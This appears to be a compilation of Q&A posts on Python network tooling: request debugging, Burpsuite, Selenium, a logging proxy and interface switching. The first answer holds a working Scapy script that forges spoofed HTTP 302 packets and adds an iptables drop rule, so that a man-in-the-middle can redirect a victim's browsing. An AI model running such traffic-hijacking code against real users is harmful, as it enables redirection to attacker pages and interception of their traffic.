I have built a MITM with Python and Scapy. I want the "victim" device to be redirected to a specific page each time it tries to access a website. Any suggestions on how to do it?
*Keep in mind that all the traffic from the device already passes through my machine before being routed.
You can directly answer HTTP requests for pages other than that specific webpage with HTTP redirections (e.g. HTTP 302). Moreover, you should route only the packets going to the desired webpage and block the rest (you can do so with a firewall such as iptables).
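For the plain-HTTP case, a minimal Scapy sketch of that idea could look like the following. The interface name, redirect URL and BPF filter are assumptions to adapt, and this only works for unencrypted traffic; HTTPS cannot be answered this way without breaking TLS.

    # Sniff HTTP GET requests on the MITM box and answer them with a 302.
    from scapy.all import IP, TCP, Raw, send, sniff

    REDIRECT_URL = "http://landing.example.local/"  # hypothetical target page

    def redirect(pkt):
        if pkt.haslayer(Raw) and pkt[Raw].load.startswith(b"GET"):
            payload = (
                b"HTTP/1.1 302 Found\r\n"
                b"Location: " + REDIRECT_URL.encode() + b"\r\n"
                b"Connection: close\r\n\r\n"
            )
            # Forge the server's answer: swap addresses/ports and continue the
            # victim's TCP sequence numbers so the browser accepts the segment.
            resp = (
                IP(src=pkt[IP].dst, dst=pkt[IP].src)
                / TCP(sport=pkt[TCP].dport, dport=pkt[TCP].sport, flags="FA",
                      seq=pkt[TCP].ack, ack=pkt[TCP].seq + len(pkt[Raw].load))
                / Raw(load=payload)
            )
            send(resp, verbose=False)

    # To avoid racing the real server, also drop forwarded port-80 traffic that
    # is not headed for the redirect target, e.g. (assumption):
    #   iptables -A FORWARD -p tcp --dport 80 ! -d <redirect_server_ip> -j DROP
    sniff(iface="eth0", filter="tcp port 80", prn=redirect, store=False)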
What would be a good way to monitor network requests made from a Python application, in the same way that the browser console does (usually in the "Network" tab)?
Ideally, this would display information such as:
url requested
headers
payload (if any)
time the request was sent
time the response was received
response headers and payload
timeline
This is mostly for debugging purposes, as the actual requests I want to track are made by third-party imports. A rich console similar to Chrome or Safari network tabs would be the absolute dream obviously, but there might be some "functional equivalents" in command-line mode as well.
Update: using macOS with root access
Without details of the operating system you are using it on, and whether you have root access, it is difficult to give a definitive answer.
However, you should consider using Wireshark (https://www.wireshark.org), which gives you pretty good insights into exactly what traffic is going from your application to the Internet and vice versa.
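If you want a command-line "functional equivalent" inside Python itself, and the third-party code goes through the standard requests/urllib3 stack, one quick option (a sketch, independent of Wireshark) is to switch on the standard library's HTTP debug output:

    import http.client
    import logging

    # Print request lines, request headers and response headers for every
    # connection made through http.client (which urllib and requests use).
    http.client.HTTPConnection.debuglevel = 1

    # urllib3 (used by requests) also logs URLs and connection events at DEBUG.
    logging.basicConfig(level=logging.DEBUG)

    import requests

    requests.get("https://example.com")  # watch the console output

This shows URLs and headers but not response bodies or a proper timeline, so for timing and payload inspection across arbitrary libraries a packet-level view in Wireshark remains the more complete option.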
I am fairly proficient in Python and have started exploring the requests library to formulate simple HTTP requests. I have also taken a look at Session objects, which allow me to log in to a website and, using the session key, continue to interact with the website through my account.
Here comes my problem: I am trying to build a simple API in Python to perform certain actions that I would be able to do via the website. However, I do not know what certain HTTP requests need to look like in order to implement them via the requests library.
In general, when I know how to perform a task via the website, how can I identify:
the type of HTTP request (GET or POST will suffice in my case)
the URL, i.e. where the resource is located on the server
the body parameters that I need to specify for the request to be successful
This has nothing to do with Python itself, but you can use a network proxy to examine your requests (a sketch of replaying a captured request from Python follows the steps below).
Download a network proxy like Burpsuite
Setup your browser to route all traffic through Burpsuite (default is localhost:8080)
Deactivate packet interception (in the Proxy tab)
Browse to your target website normally
Examine the request history in Burpsuite. You will find all the information you need
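Once you have found the request in Burpsuite's history, reproducing it with the requests library is straightforward. The sketch below uses a made-up login flow, so the URLs, field names and values are placeholders; routing the script through Burpsuite as well lets you diff your request against the browser's.

    import requests

    # hypothetical: send the script's traffic through Burpsuite too
    BURP_PROXY = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}

    with requests.Session() as s:
        s.proxies.update(BURP_PROXY)
        s.verify = False  # only while debugging: Burpsuite's CA is not trusted

        # method, URL and body parameters copied from the request seen in Burpsuite
        s.post("https://example.com/login",
               data={"username": "me", "password": "secret"})
        r = s.get("https://example.com/api/items")
        print(r.status_code, r.headers.get("Content-Type"), len(r.text))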
I'm trying to test the response time of webpages hosted on many backends. These hosts sit behind a load balancer, and above that I have my domain.com.
I want to use python+selenium against these backends but with a spoofed hostname, without messing with /etc/hosts or running fake DNS servers. Is that possible with pure Selenium drivers?
To illustrate the problem better: with curl I can send the request to a chosen backend while keeping the original hostname, and I'd like to do the same with python+selenium.
If you're on a UNIX system, you can try something as explained here:
https://unix.stackexchange.com/questions/10438/can-i-create-a-user-specific-hosts-file-to-complement-etc-hosts
Basically you still use a hosts file, but one that applies only to you (e.g. ~/.hosts), pointed to by the HOSTALIASES environment variable.
In short, no.
Selenium drives browsers using the WebDriver standard, which is by definition limited to interactions with page content. Even though you can provide Selenium with configuration options for the browser, no browser provides control over Host headers or DNS resolution outside of a proxy.
But even if you could initiate a request for a particular IP address with a custom Host header, subsequent requests triggered by the content (redirects, downloading of page assets, AJAX calls, etc.) would still be outside of your control and are prohibited from customizing the Host header, leading the browser to fall back to standard DNS resolution.
Your only options are modifying the local DNS resolution (via /etc/hosts) or providing an alternative (via a proxy).
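If you go the proxy route, a minimal sketch of pointing Selenium-driven Chrome at a forward proxy you control could look like this; the proxy address is an assumption, and the proxy itself is what maps domain.com to the specific backend you want to time.

    from selenium import webdriver

    options = webdriver.ChromeOptions()
    # hypothetical local forward proxy that resolves domain.com to one backend
    options.add_argument("--proxy-server=http://127.0.0.1:3128")

    driver = webdriver.Chrome(options=options)
    try:
        driver.get("https://domain.com/")
        print(driver.title)
    finally:
        driver.quit()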
I'm thinking of writing an application that, while running, keeps track of all the websites I visit and connections I make.
Basically like a browser history, but I want to do it in a way that utilizes network concepts.
I only have a rudimentary understanding of HTTP, but would I be able to listen in on HTTP GET requests from the browser and automatically pull information whenever a request is made? If anyone can give me a suggestion or an outline of how this can be done, so I can research how to implement it, that would be very helpful! I'm thinking of implementing it in Python, and my operating system is Ubuntu.
Thank you very much.
You could do that by implementing a proxy.
In your case, that is basically an agent that sits between your browser and the internet. The proxy receives the request from the client, forwards it to the remote server, and when the remote server replies, it sends the server's response back to the client.
To retrieve the information you want, reading the HTTP RFC will be helpful.
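As a rough illustration only (plain HTTP, no HTTPS/CONNECT handling, one read per request, relaying until the server closes the connection; the port and buffer sizes are arbitrary), a tiny logging proxy in Python could look like this:

    import socket
    import threading

    LISTEN = ("127.0.0.1", 8888)  # point the browser's HTTP proxy setting here

    def handle(client):
        request = client.recv(65535)
        if not request:
            client.close()
            return
        # First line is e.g. "GET http://example.com/ HTTP/1.1" -- your history.
        print("[history]", request.split(b"\r\n", 1)[0].decode(errors="replace"))

        # The Host header tells us where to forward the request.
        host = None
        for line in request.split(b"\r\n"):
            if line.lower().startswith(b"host:"):
                host = line.split(b":", 1)[1].strip().decode()
                break
        if host is None:
            client.close()
            return
        hostname, _, port = host.partition(":")
        with socket.create_connection((hostname, int(port or 80))) as upstream:
            upstream.sendall(request)
            while True:  # relay the server's answer back to the browser
                chunk = upstream.recv(65535)
                if not chunk:
                    break
                client.sendall(chunk)
        client.close()

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(LISTEN)
        server.listen(5)
        print("proxy listening on %s:%d" % LISTEN)
        while True:
            conn, _ = server.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()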
I am using code from https://github.com/inaz2/proxy2. However, I want the proxy server to be able to use two network interfaces and switch between them depending on the page body, e.g. if the page body contains something like "Access Denied" (my college has blocked a ton of sites), I want it to use another network interface (e.g. a USB-tethered mobile phone). Is it possible to edit the response_handler function of the code to do this?
That's not really the proxy's concern; I recommend configuring the routing table instead.
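If you still want to experiment from Python, the usual building block is binding the outgoing socket to the second interface's address (the IP below is an assumption). Note that without matching routing rules the kernel may still send the packets out of the default interface, which is why fixing the routing table is the cleaner solution:

    import http.client

    SECOND_IF_IP = "192.168.42.129"  # hypothetical: the USB-tethered phone's address

    def fetch(host, path, source_ip=None):
        # source_address binds the local end of the TCP connection to that IP
        kwargs = {"source_address": (source_ip, 0)} if source_ip else {}
        conn = http.client.HTTPConnection(host, 80, timeout=10, **kwargs)
        try:
            conn.request("GET", path)
            body = conn.getresponse().read()
        finally:
            conn.close()
        return body

    body = fetch("example.com", "/")
    if b"Access Denied" in body:  # blocked on the primary link, retry via the phone
        body = fetch("example.com", "/", source_ip=SECOND_IF_IP)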